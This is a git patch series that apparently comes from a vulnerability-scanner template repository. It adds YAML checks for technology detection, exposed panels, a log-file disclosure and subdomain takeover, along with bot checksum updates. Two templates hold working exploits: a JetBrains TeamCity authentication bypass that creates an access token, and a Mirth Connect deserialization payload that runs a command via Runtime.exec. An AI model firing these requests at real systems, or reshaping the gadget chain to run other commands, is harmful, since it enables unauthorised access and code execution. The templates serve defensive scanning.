a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml new file mode 100644 index 0000000000..21760e0ec2 --- /dev/null +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-23917 + +info: + name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible + reference: + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23917 + cwe-id: CWE-306,CWE-288 + epss-score: 0.00091 + epss-percentile: 0.38219 + cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: jetbrains + product: teamcity + tags: cve,cve2024,auth-bypass,teamcity + +flow: http(1) && http(2) +http: + - method: POST + path: + - "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true" + headers: + Content-Type: "application/x-www-form-urlencoded" + + matchers: + - type: dsl + dsl: + - status_code==200 + - "contains(content_type,'application/xml')" + - 'contains(body,"<token name=\"{{randstr}}\"")' + condition: and + + extractors: + - type: regex + part: body + name: authtoken + internal: true + group: 1 + regex: + - 'value="(.+)"' + + - method: GET + path: + - "{{BaseURL}}/app/rest/server" + headers: + Authorization: "Bearer {{authtoken}}" + + extractors: + - type: dsl + dsl: + - '"Token:" + authtoken' + + matchers: + - type: dsl + dsl: + - "status_code==200" + - "contains(content_type,'application/xml')" + - "contains(body,'<projects href=')" + condition: and From 8da72118d1f203014d34a8dcf10753df7d123a9d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 30 Apr 2024 18:25:33 +0530 Subject: [PATCH 0467/1768] minor update --- http/cves/2024/CVE-2024-23917.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 21760e0ec2..5eb4784e0b 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -38,6 +38,7 @@ http: - "contains(content_type,'application/xml')" - 'contains(body,"<token name=\"{{randstr}}\"")' condition: and + internal: true extractors: - type: regex From 4be17c8a3dfc539ff42d2a0b0708eb493a42798d Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Tue, 30 Apr 2024 19:49:12 +0300 Subject: [PATCH 0468/1768] cve-2023-5003 add --- http/cves/2023/CVE-2023-5003.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 http/cves/2023/CVE-2023-5003.yaml diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml new file mode 100644 index 0000000000..e69de29bb2 From 4ea43c1eda7b5b70f53bdb8ebb808a4ec9095d9f Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Tue, 30 Apr 2024 20:00:04 +0300 Subject: [PATCH 0469/1768] add file --- http/cves/2023/CVE-2023-5003.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index e69de29bb2..3bd92b33d8 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-5003 + +info: + name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure + author: Kazgangap + severity: high + description: | + The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-5003 + - https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-5003 + epss-score: 0.00084 + epss-percentile: 0.35002 + cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* + metadata: + vendor: miniorange + product: active_directory_integration_\/_ldap_integration + framework: wordpress + tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/ldap-authentication-report.csv" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "ID" + - "USERNAME" + - "TIME" + - "LDAP STATUS" + condition: and \ No newline at end of file From 301789938e7e522a7fd20207b514bf88d431ce81 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Tue, 30 Apr 2024 22:29:42 +0330 Subject: [PATCH 0470/1768] Add umami-detect template --- http/technologies/umami-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/technologies/umami-detect.yaml diff --git a/http/technologies/umami-detect.yaml b/http/technologies/umami-detect.yaml new file mode 100644 index 0000000000..f5c4e43ae3 --- /dev/null +++ b/http/technologies/umami-detect.yaml @@ -0,0 +1,28 @@ +id: umami-detect + +info: + name: Umami Detect + author: userdehghani + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"umami" + tags: tech,umami,analytics + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>umami - login" + - "

umami

" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d0b9af2fc7fd9273536cfbf4a46d025505d935c2 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Tue, 30 Apr 2024 23:17:57 +0330 Subject: [PATCH 0471/1768] Update umami-detect.yaml --- http/technologies/umami-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/technologies/umami-detect.yaml b/http/technologies/umami-detect.yaml index f5c4e43ae3..ce2a42af6e 100644 --- a/http/technologies/umami-detect.yaml +++ b/http/technologies/umami-detect.yaml @@ -19,10 +19,10 @@ http: - type: word part: body words: - - "umami - login" - - "

umami

" + - 'umami - login' + - '

umami

' condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 0abae9dc37adfb16934b291dcc865e602aa841aa Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:12:01 -0300 Subject: [PATCH 0472/1768] Create boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 33 ++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/boa-webserver.yaml diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml new file mode 100644 index 0000000000..e9cf35127e --- /dev/null +++ b/http/exposed-panels/boa-webserver.yaml @@ -0,0 +1,33 @@ +id: boa-webserver + +info: + name: Boa Web Server- Detect + author: johnk3r + severity: info + description: Boa Web Server panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + tags: boa,panel + +http: + - method: GET + path: + - "{{BaseURL}}/admin/login.asp" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Boa" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 006e644ece73942cc5c06e16bf753653eb22d6ea Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:16:59 -0300 Subject: [PATCH 0473/1768] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index e9cf35127e..69b5dbb3f0 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -5,6 +5,8 @@ info: author: johnk3r severity: info description: Boa Web Server panel was detected. + reference: + - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 0771e35cb810267146af011735a3c403d52fdc5d Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:19:25 -0300 Subject: [PATCH 0474/1768] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 69b5dbb3f0..6027b0d1d5 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -15,7 +15,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/admin/login.asp" + - "{{BaseURL}}" matchers-condition: and matchers: From 52ca8ac5b1a60f6ba5d26644f12dca1f631e607b Mon Sep 17 00:00:00 2001 From: johnk3r Date: Tue, 30 Apr 2024 19:19:35 -0300 Subject: [PATCH 0475/1768] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 6027b0d1d5..7510f68dc1 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -22,7 +22,7 @@ http: - type: regex part: header regex: - - "Boa" + - "Boa/" - type: status status: From 4cd3f86ee3745e18f4ba4fea8fc42c598c007a74 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 30 Apr 2024 22:09:10 -0500 Subject: [PATCH 0476/1768] Update surge-takeover.yaml HTTP response code added. And matches condition. Added Github issue about the takeover. --- http/takeovers/surge-takeover.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index 2454f1bb7b..abafbacdff 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high description: surge takeover was detected. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/198 metadata: max-request: 1 tags: takeover @@ -25,4 +25,9 @@ http: - type: word words: - project not found -# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: status + status: + - 404 + +# digest: 490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950 From 9c86ba42f2babea530bde39333821e963092d917 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 30 Apr 2024 23:15:58 -0500 Subject: [PATCH 0477/1768] Update unauthenticated-jenkins.yaml max requests set to 2 --- http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml index cc1c3cfc4c..8159ae07ac 100644 --- a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml +++ b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml @@ -6,7 +6,7 @@ info: severity: high description: Jenkins Dashboard is exposed to external users. metadata: - max-request: 1 + max-request: 2 tags: jenkins http: @@ -26,4 +26,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cef11be2e4fc4d5fe925f91269917b5763805635e48d3ae6c5ead57dbe56d9e0022100e2b91fe6026d44a02b15e34655c58d3a95cb070db314386bbb568a1f1b05ace3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cef11be2e4fc4d5fe925f91269917b5763805635e48d3ae6c5ead57dbe56d9e0022100e2b91fe6026d44a02b15e34655c58d3a95cb070db314386bbb568a1f1b05ace3:922c64590222798bb761d5b6d8e72950 From c2e1b9002cdec54c0979b1fef8ba8523d541dae9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 05:51:31 +0000 Subject: [PATCH 0478/1768] Auto Generated New Template Addition List [Wed May 1 05:51:31 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0b4e3fbeff..eee75b3ceb 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposed-panels/cassia-bluetooth-gateway-panel.yaml http/exposed-panels/femtocell-panel.yaml http/exposed-panels/monitorr-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-rce.yaml From 5e2c12d832bc63ba4b4ed6aaf53a3d37cfbe3f75 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 05:51:45 +0000 Subject: [PATCH 0479/1768] Auto Generated Templates Checksum [Wed May 1 05:51:45 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index aa19fe4291..65048f24fe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5343,6 +5343,7 @@ http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf81728 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a +http/misconfiguration/installer/eyoucms-installer.yaml:7971289ea729632e3c7de1d0b5b1c725f246727b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8457,7 +8458,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c97adf8e46768c9f63f051e05dd1c8224e688923 +templates-checksum.txt:c340d5b42dd713d6bc727ffece3f145c585cf4bc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 901e067562ab9f4264601c16123a85a67c689e97 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 05:52:09 +0000 Subject: [PATCH 0480/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e4b23a3e7e..48b46dc5cd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/monitorr-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-rce.yaml' From 94aece398922d640afb8f8a106711bc433160777 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 05:52:59 +0000 Subject: [PATCH 0481/1768] Auto Generated New Template Addition List [Wed May 1 05:52:59 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eee75b3ceb..2bfc00a983 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-32077.yaml +http/cves/2023/CVE-2023-38964.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml From 99a2bca753d88ee2af83db36b16e7d7738bc732f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 05:53:04 +0000 Subject: [PATCH 0482/1768] Auto Generated Templates Checksum [Wed May 1 05:53:04 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 65048f24fe..7a40a31c27 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3103,6 +3103,7 @@ http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52 http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8 http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab +http/cves/2023/CVE-2023-38964.yaml:87e3e1154c48c90c8ac7ba829355bd16cc8c50a8 http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7 http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3 http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882 @@ -8458,7 +8459,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c340d5b42dd713d6bc727ffece3f145c585cf4bc +templates-checksum.txt:42696a4768b0e2efb8dc2ccc784302b19dcb42e8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cf143387e81e8c3113b117265122ae54e206b7dc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 05:53:21 +0000 Subject: [PATCH 0483/1768] Auto Template Signing [Wed May 1 05:53:21 UTC 2024] :robot: --- http/misconfiguration/installer/eyoucms-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/eyoucms-installer.yaml b/http/misconfiguration/installer/eyoucms-installer.yaml index 10a87d98df..137206ec8e 100644 --- a/http/misconfiguration/installer/eyoucms-installer.yaml +++ b/http/misconfiguration/installer/eyoucms-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022005864c291f566f94cb1cc5267ab73f7b7b0d2b18a6f1c698c2a27afc1dbace6b02210096de625a1792dfa0a8ef36f8cf036acd78968f54f7726da711d3a777b31fe1a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1615bad02c2034ffac261830fd56bb5646b4ad16 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 05:53:39 +0000 Subject: [PATCH 0484/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 48b46dc5cd..bf40b54d5b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-32077.yaml' + - 'http/cves/2023/CVE-2023-38964.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' From 7da719de3bea68c7205de5edfdab945d162ad87f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 1 May 2024 11:48:03 +0530 Subject: [PATCH 0485/1768] Create CVE-2023-43208.yaml --- http/cves/2023/CVE-2023-43208.yaml | 106 +++++++++++++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43208.yaml diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml new file mode 100644 index 0000000000..a1a9c1ca94 --- /dev/null +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -0,0 +1,106 @@ +id: CVE-2023-43208 + +info: + name: NextGen Healthcare Mirth Connect - Remote Code Execution + author: princechaddha + severity: critical + description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1. + impact: | + Successful exploitation could result in unauthorized access and potential compromise of sensitive data. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html + - https://github.com/nvn1729/advisories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-43208 + epss-score: 0.00349 + epss-percentile: 0.71422 + cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* + metadata: + vendor: nextgen + product: mirth_connect + shodan-query: title:"mirth connect administrator" + tags: cve,cve2023,nextgen,rce + +http: + - raw: + - | + GET /api/server/version HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: OpenAPI + - | + POST /api/users HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: OpenAPI + Content-Type: application/xml + + + abcd + + java.lang.Comparable + + + + + java.lang.Runtime + + + getMethod + + java.lang.String + [Ljava.lang.Class; + + + getRuntime + + + + + invoke + + java.lang.Object + [Ljava.lang.Object; + + + + + + + + exec + + java.lang.String + + + nslookup {{interactsh-url}} + + + + + transform + + compareTo + + + + + + matchers: + - type: dsl + dsl: + - 'compare_versions(version, "<4.4.1")' + - 'contains(interactsh_protocol, "dns")' + - 'status_code_1 == 200 && status_code_2 == 500' + condition: and + + extractors: + - type: regex + part: body_1 + name: version + group: 1 + regex: + - '(.*)' + internal: true From c1f49df206acfd946f0cb1e16c15efc9b292e533 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 06:28:22 +0000 Subject: [PATCH 0486/1768] Auto Generated New Template Addition List [Wed May 1 06:28:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2bfc00a983..a939cb9fdb 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-32077.yaml http/cves/2023/CVE-2023-38964.yaml +http/cves/2023/CVE-2023-43208.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml From 2e425c80c9e901c023e80910cf942a34adc422fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 06:28:32 +0000 Subject: [PATCH 0487/1768] Auto Generated Templates Checksum [Wed May 1 06:28:32 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7a40a31c27..9c1a3c9dae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3148,6 +3148,7 @@ http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9 http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4 http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f +http/cves/2023/CVE-2023-43208.yaml:2bfcf71b993bf421ef04f99f1669c57bb45d1060 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d @@ -5344,7 +5345,7 @@ http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf81728 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a -http/misconfiguration/installer/eyoucms-installer.yaml:7971289ea729632e3c7de1d0b5b1c725f246727b +http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8459,7 +8460,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:42696a4768b0e2efb8dc2ccc784302b19dcb42e8 +templates-checksum.txt:fe1e149a3a849d0216c038a879470d701855957d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9190f7aba0f4df3be203cd8142c7bbf1ea5c119a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 1 May 2024 06:29:06 +0000 Subject: [PATCH 0488/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bf40b54d5b..249b94f1ec 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-32077.yaml' - 'http/cves/2023/CVE-2023-38964.yaml' + - 'http/cves/2023/CVE-2023-43208.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' From 109130c857f175d5a685f82728fdc4cdceeaf6b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 06:29:47 +0000 Subject: [PATCH 0489/1768] Auto Generated cves.json [Wed May 1 06:29:47 UTC 2024] :robot: --- cves.json | 6 ++++++ cves.json-checksum.txt | 2 +- 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 61f889e407..b22156eddc 100644 --- a/cves.json +++ b/cves.json @@ -2132,6 +2132,7 @@ {"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"} {"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - 